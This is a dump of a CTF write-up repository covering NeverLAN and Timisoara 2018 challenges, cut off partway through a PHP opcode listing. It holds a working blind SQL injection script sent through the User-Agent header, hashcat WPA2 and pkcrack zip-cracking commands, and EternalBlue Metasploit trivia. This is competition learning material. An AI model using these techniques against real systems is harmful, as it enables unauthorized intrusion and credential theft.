https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Italian/it_cp1252-special.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Polish/pl_cp1250-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Polish/pl_cp1250-special.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Portuguese/pt_ISO-8859-1-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Portuguese/pt_ISO-8859-1-special.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Portuguese/pt_ISO-8859-15-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Portuguese/pt_ISO-8859-15-special.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Portuguese/pt_cp1252-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Portuguese/pt_cp1252-special.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Russian/ru_ISO-8859-5-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Russian/ru_ISO-8859-5-special.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Russian/ru_cp1251-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Russian/ru_cp1251-special.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Slovak/sk_ISO-8859-2-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Slovak/sk_ISO-8859-2-special.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Slovak/sk_cp1250-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Slovak/sk_cp1250-special.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Spanish/es_ISO-8859-1-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Spanish/es_ISO-8859-1-special.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Spanish/es_ISO-8859-15-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Spanish/es_ISO-8859-15-special.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Spanish/es_cp1252-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Spanish/es_cp1252-special.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Bulgarian/bg_ISO-8859-5.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Bulgarian/bg_ISO-8859-5.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Bulgarian/bg_KOI8-R.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Bulgarian/bg_KOI8-R.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Bulgarian/bg_cp1251.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Bulgarian/bg_cp1251.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Castilian/es-ES_ISO-8859-1.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Castilian/es-ES_ISO-8859-1.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Castilian/es-ES_ISO-8859-15.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Castilian/es-ES_ISO-8859-15.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Castilian/es-ES_cp1252.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Castilian/es-ES_cp1252.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Catalan/ca_ISO-8859-1.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Catalan/ca_ISO-8859-1.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Catalan/ca_ISO-8859-15.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Catalan/ca_ISO-8859-15.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Catalan/ca_cp1252.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/Catalan/ca_cp1252.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/English/en_ISO-8859-1.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/English/en_ISO-8859-1.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/English/en_ISO-8859-15.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/English/en_ISO-8859-15.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/English/en_cp1252.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/English/en_cp1252.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/French/fr_ISO-8859-1.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/French/fr_ISO-8859-1.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/French/fr_ISO-8859-15.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/French/fr_ISO-8859-15.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/French/fr_cp1252.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/standard/French/fr_cp1252.hcchr
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/The-WIFI-Network/README.md:
--------------------------------------------------------------------------------
1 | # The WIFI Network (200)
2 |
3 | ~~~
4 | Name: The WIFI Network
5 |
6 | Author: bashninja
7 |
8 | Description: So we're still trying to get into the Jedi Archives. Let's try cracking the WiFi. Here's a WPA2 Handshanke I picked up while near the building.
9 | ~~~
10 |
11 | cap to hccapx : https://hashcat.net/cap2hccapx/
12 |
13 | rockyou.txt : http://www.mediafire.com/file/7d7nz2kku7urzor/rockyou.txt
14 |
15 | ~~~
16 | > hashcat neverlan.hccapx -a 0 -m 2500 rockyou.txt
17 | ~~~
18 |
19 | flag{obiwan17}
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/The-WIFI-Network/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/The-WIFI-Network/flag.png
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/The-WIFI-Network/neverlan.cap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/The-WIFI-Network/neverlan.cap
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/The-WIFI-Network/neverlan.hccapx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/The-WIFI-Network/neverlan.hccapx
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/Zip-Attack/README.md:
--------------------------------------------------------------------------------
1 | # Zip Attack (100)
2 |
3 | ~~~
4 | ./pkcrack -C encrypted.zip -c "supersecretstuff/sw-iphone-wallpaper-first-order.jpg" -P known-file.zip -p "sw-iphone-wallpaper-first-order.jpg" -d de.zip -a
5 | ~~~
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/Zip-Attack/encrypted.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/Zip-Attack/encrypted.zip
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/Zip-Attack/known-file.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/Zip-Attack/known-file.zip
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/Zip-Attack/sw-iphone-wallpaper-first-order.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/Zip-Attack/sw-iphone-wallpaper-first-order.jpg
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/README.md:
--------------------------------------------------------------------------------
1 | # NeverLAN CTF - gazoku (4th)
2 |
3 | ~~~
4 | My first team ctf solo play challenge :D
5 | ~~~
6 |
7 |
8 | Review (Korean) - [Here](http://blog.withphp.com/post/105)
9 |
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Recon/Happy hunting.txt:
--------------------------------------------------------------------------------
1 | flag{packethackingvillage}
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Recon/Neo's-recon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Recon/Neo's-recon.png
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Recon/Purvesta's-recon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Recon/Purvesta's-recon.png
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Recon/Viking's-recon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Recon/Viking's-recon.png
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Recon/Zesty's-challenge.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Recon/Zesty's-challenge.png
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Recon/s7a73farm's-recon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Recon/s7a73farm's-recon.png
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Reversing/Commitment-Issues/Commitmen-Issues(flag).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Reversing/Commitment-Issues/Commitmen-Issues(flag).png
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Scripting/JSON-parsing-1/statistics.py:
--------------------------------------------------------------------------------
1 | from re import findall
2 | # made by munsiwoo
3 |
4 | antivirusList = ['Bkav','K7AntiVirus','MicroWorld-eScan','nProtect','CMC','CAT-QuickHeal',
5 | 'ALYac','Malwarebytes','Zillya','SUPERAntiSpyware','TheHacker','K7GW','CrowdStrike',
6 | 'Arcabit','Invincea','Baidu','F-Prot','Symantec','TotalDefense','TrendMicro-HouseCall',
7 | 'Avast','ClamAV','Kaspersky','BitDefender','NANO-Antivirus','Paloalto','ViRobot','Tencent',
8 | 'Ad-Aware','Emsisoft','Comodo','F-Secure','DrWeb','VIPRE','TrendMicro','McAfee-GW-Edition',
9 | 'Sophos','Ikarus','Cyren','Jiangmin','Webroot','Avira','Antiy-AVL','Kingsoft','Endgame',
10 | 'Microsoft','AegisLab','ZoneAlarm','Avast-Mobile','GData','AhnLab-V3','McAfee','AVware',
11 | 'MAX','VBA32','Cylance','WhiteArmor','Zoner','ESET-NOD32','Rising','Yandex','SentinelOne',
12 | 'eGambit','Fortinet','AVG','Panda','Qihoo-360', 'SymantecMobileInsight', 'Alibaba', 'Trustlook']
13 |
14 | antivirus = []
15 | totalCount = []
16 |
17 | file = open("file-20171020T1500", 'r')
18 | read = file.read()
19 |
20 | find = findall("\"([a-zA-Z0-9-]+)\": {\"detected\": (true|false)", read)
21 | i = 0
22 |
23 | for x in find :
24 | if(x[1] == 'true') :
25 | i += 1
26 | #print(str(i)+" : "+x[0])
27 | antivirus.append(x[0])
28 |
29 | #print(i)
30 | #print(len(antivirus))
31 |
32 | for y in antivirusList :
33 | count = antivirus.count(y)
34 | #antivirus = list(filter(lambda word: word != y, antivirus))
35 | print(y + " : " + str(count))
36 | totalCount.append(count)
37 |
38 | totalCount.sort()
39 |
40 | print(totalCount)
41 | #print(antivirus)
42 |
43 | '''
44 |
45 | ESET-NOD32,Ikarus,McAfee,CAT-QuickHeal,DrWeb
46 | ESET-NOD32,Ikarus,McAfee,CAT-QuickHeal,Fortinet
47 |
48 | Why is not it auth???
49 |
50 | '''
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Scripting/basic-math/sum.py:
--------------------------------------------------------------------------------
1 | num = '''6255385361218216
2 | 6157005081529331
3 | 8094787234940670
4 | 1979194212824551
5 | 3930726164428768
6 | 5191869878056791
7 | 7528262998799463
8 | 5345470866315424
9 | 1647835474241505
10 | 3432404873925893'''
11 |
12 | cal = num.replace("\n", "+")
13 | eval("print("+str(cal)+")")
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Scripting/even-more-basic-math-with-some-junk/sum.py:
--------------------------------------------------------------------------------
1 | import re
2 | # made by munsiwoo
3 |
4 | f = open('even_more_numbers_with_some_mild_inconveniences.txt', 'r')
5 | result = 0
6 |
7 | readall = f.read()
8 | numlist = re.findall('\d+', readall)
9 |
10 | for x in range(0, len(numlist)) :
11 | result += int(numlist[x])
12 |
13 | print(result)
14 |
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Scripting/more-basic-math/sum.py:
--------------------------------------------------------------------------------
1 | #made by munsiwoo
2 |
3 | f = open('some_more_numbers.txt', 'r')
4 | result = 0
5 |
6 | for i in range(0, 10000) :
7 | number = f.readline()
8 | result += int(number)
9 |
10 |
11 | print(result)
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Trivia/How_far_can_you_go(not-solved)/1.txt:
--------------------------------------------------------------------------------
1 | The password to the zip is the handle of the author.
2 |
3 |
4 |
5 |
6 |
7 | =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
8 | The following was written shortly after my arrest...
9 |
10 | \/\The Conscience of a Hacker/\/
11 |
12 |
13 |
14 |
15 |
16 | Written on January 8, 1986
17 | =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
18 |
19 | Another one got caught today, it's all over the papers. "Teenager
20 | Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...
21 | Damn kids. They're all alike.
22 |
23 | But did you, in your three-piece psychology and 1950's technobrain,
24 | ever take a look behind the eyes of the hacker? Did you ever wonder what
25 | made him tick, what forces shaped him, what may have molded him?
26 | I am a hacker, enter my world...
27 | Mine is a world that begins with school... I'm smarter than most of
28 | the other kids, this crap they teach us bores me...
29 | Damn underachiever. They're all alike.
30 |
31 | I'm in junior high or high school. I've listened to teachers explain
32 | for the fifteenth time how to reduce a fraction. I understand it. "No, Ms.
33 | Smith, I didn't show my work. I did it in my head..."
34 | Damn kid. Probably copied it. They're all alike.
35 |
36 | I made a discovery today. I found a computer. Wait a second, this is
37 | cool. It does what I want it to. If it makes a mistake, it's because I
38 | screwed it up. Not because it doesn't like me...
39 | Or feels threatened by me...
40 | Or thinks I'm a smart ass...
41 | Or doesn't like teaching and shouldn't be here...
42 | Damn kid. All he does is play games. They're all alike.
43 |
44 | And then it happened... a door opened to a world... rushing through
45 | the phone line like heroin through an addict's veins, an electronic pulse is
46 | sent out, a refuge from the day-to-day incompetencies is sought... a board is
47 | found.
48 | "This is it... this is where I belong..."
49 | I know everyone here... even if I've never met them, never talked to
50 | them, may never hear from them again... I know you all...
51 | Damn kid. Tying up the phone line again. They're all alike...
52 |
53 | You bet your ass we're all alike... we've been spoon-fed baby food at
54 | school when we hungered for steak... the bits of meat that you did let slip
55 | through were pre-chewed and tasteless. We've been dominated by sadists, or
56 | ignored by the apathetic. The few that had something to teach found us will-
57 | ing pupils, but those few are like drops of water in the desert.
58 |
59 | This is our world now... the world of the electron and the switch, the
60 | beauty of the baud. We make use of a service already existing without paying
61 | for what could be dirt-cheap if it wasn't run by profiteering gluttons, and
62 | you call us criminals. We explore... and you call us criminals. We seek
63 | after knowledge... and you call us criminals. We exist without skin color,
64 | without nationality, without religious bias... and you call us criminals.
65 | You build atomic bombs, you wage wars, you murder, cheat, and lie to us
66 | and try to make us believe it's for our own good, yet we're the criminals.
67 |
68 | Yes, I am a criminal. My crime is that of curiosity. My crime is
69 | that of judging people by what they say and think, not what they look like.
70 | My crime is that of outsmarting you, something that you will never forgive me
71 | for.
72 |
73 | I am a hacker, and this is my manifesto. You may stop this individual,
74 | but you can't stop us all... after all, we're all alike.
75 |
76 |
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Trivia/How_far_can_you_go(not-solved)/2.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Trivia/How_far_can_you_go(not-solved)/2.zip
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Trivia/How_far_can_you_go(not-solved)/3.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Trivia/How_far_can_you_go(not-solved)/3.zip
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Trivia/How_far_can_you_go(not-solved)/Alice.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Trivia/How_far_can_you_go(not-solved)/Alice.zip
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Trivia/README.md:
--------------------------------------------------------------------------------
1 | # Trivia Flags
2 |
3 | ~~~
4 | Can you Name it? - Common Vulnerabilities and Exposures
5 | Can you find it? (Bonus) - EternalBlue
6 | Can you find it? - CVE-2017-0144
7 | Can you use it? - exploit/windows/smb/ms17_010_eternalblue
8 | I love tools - Developer Tools
9 | Yummy... - cookies
10 | What is it - exploit-db
11 | Can you search it? - 0xffffffffffd00010
12 | Who knew? - Windows Nt
13 | ~~~
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/challenge-screenshot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/challenge-screenshot.png
--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/ranking-screenshot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/ranking-screenshot.png
--------------------------------------------------------------------------------
/2018/Timisoara-CTF-2018-Final/README.md:
--------------------------------------------------------------------------------
1 | # Timisoara CTF 2018 Final Web Write-ups
2 | ~~~
3 | second place in Timisoara CTF Final (NextLine)
4 | 2018.06.09 - 2018.06.10
5 | Written by Siwoo Mun (munsiwoo)
6 | ~~~
7 |
8 | ### SQL Sanity Check (100pts)
9 |
10 | SQL Sanity Check is postgresql injection challenge.
11 | injection point is `User-Agent` header. (request)
12 |
13 | my blind sqli script ``exploit.py``
14 | ```python
15 | from requests import post
16 | import string
17 | # made by munsiwoo
18 |
19 | def rot(argv) :
20 | rot15_table = {
21 | 'a':'p', 'b':'q', 'c':'r', 'd':'s', 'e':'t', 'f':'u',
22 | 'g':'v', 'h':'w', 'i':'x', 'j':'y', 'k':'z', 'l':'a',
23 | 'm':'b', 'n':'c', 'o':'d', 'p':'e', 'q':'f', 'r':'g',
24 | 's':'h', 't':'i', 'u':'j', 'v':'k', 'w':'l', 'x':'m',
25 | 'y':'n', 'z':'o',
26 | 'A':'P', 'B':'Q', 'C':'R', 'D':'S', 'E':'T', 'F':'U',
27 | 'G':'V', 'H':'W', 'I':'X', 'J':'Y', 'K':'Z', 'L':'A',
28 | 'M':'B', 'N':'C', 'O':'D', 'P':'E', 'Q':'F', 'R':'G',
29 | 'S':'H', 'T':'I', 'U':'J', 'V':'K', 'W':'L', 'X':'M',
30 | 'Y':'N', 'Z':'O'
31 | }
32 | val = str()
33 |
34 | for x in argv :
35 | if(x in string.ascii_letters) :
36 | val += rot15_table[x]
37 | else :
38 | val += x
39 |
40 | return val
41 |
42 | def main() :
43 | uri = 'http://89.38.210.129:8093/login.php'
44 | data = {'email': ''}
45 | headers = {
46 | 'Content-Type': 'application/x-www-form-urlencoded',
47 | 'Cookie': 'PHPSESSID=4is785omsp8monrenoop16len7',
48 | 'User-Agent': ''
49 | }
50 |
51 | # public:fl4g_1337:flag
52 | # payload = "' or substr((select table_schema||':'||table_name||':'||column_name from "
53 | # payload += "information_schema.columns where table_schema='public' limit 1), {}, 1)='{}"
54 | # timctf{1mP0rt4nT_r34lly_l0nG_ex7ra_l0nG_Fl4G_f0R_h34D_Mas7eR}
55 |
56 | payload = "' or substr((select flag from fl4g_1337 limit 1), {}, 1)='{}"
57 | query = (lambda x, y:payload.format(x,y))
58 | strings = '{}:_' + string.ascii_letters + string.digits;
59 | result = str()
60 |
61 | for x in range(1, 100) :
62 | for y in strings :
63 | headers['User-Agent'] = rot(query(x, y))
64 | response = post(uri, data=data, headers=headers).text
65 |
66 | if(response.find("Welcome back!") != -1) :
67 | result += y
68 | break
69 |
70 | if(y == '9') :
71 | exit(0)
72 |
73 | print(result)
74 |
75 | if __name__ == '__main__' :
76 | main()
77 |
78 | ```
79 |
80 | a piece of cake =)
81 |
82 |
83 |
84 | ### PHP REvival (200pts)
85 |
86 | PHP REvival is php zend engine opcode analyze challenge.
87 | reference : http://php.net/manual/kr/internals2.opcodes.php
88 | ```
89 | function name: (null)
90 | compiled vars: none
91 | line #* E I O op fetch ext return operands
92 | -------------------------------------------------------------------------------------
93 | 3 0 E > NOP
94 | 14 1 INIT_FCALL 'getflag'
95 | 2 FETCH_R global $0 '_REQUEST'
96 | 3 FETCH_DIM_R $1 $0, 'g'
97 | 4 SEND_VAR $1
98 | 5 DO_FCALL 0 $2
99 | 6 ECHO $2
100 | 21 7 > RETURN 1
101 |
102 | function name: getFlag
103 | compiled vars: !0 = $guess, !1 = $flag
104 | line #* E I O op fetch ext return operands
105 | -------------------------------------------------------------------------------------
106 | 3 0 E > RECV !0
107 | 4 1 ASSIGN !1, '*CENSORED_FLAG*'
108 | 6 2 STRLEN ~3 !0
109 | 3 IS_NOT_IDENTICAL ~4 ~3, 8
110 | 4 > JMPZ ~4, ->6
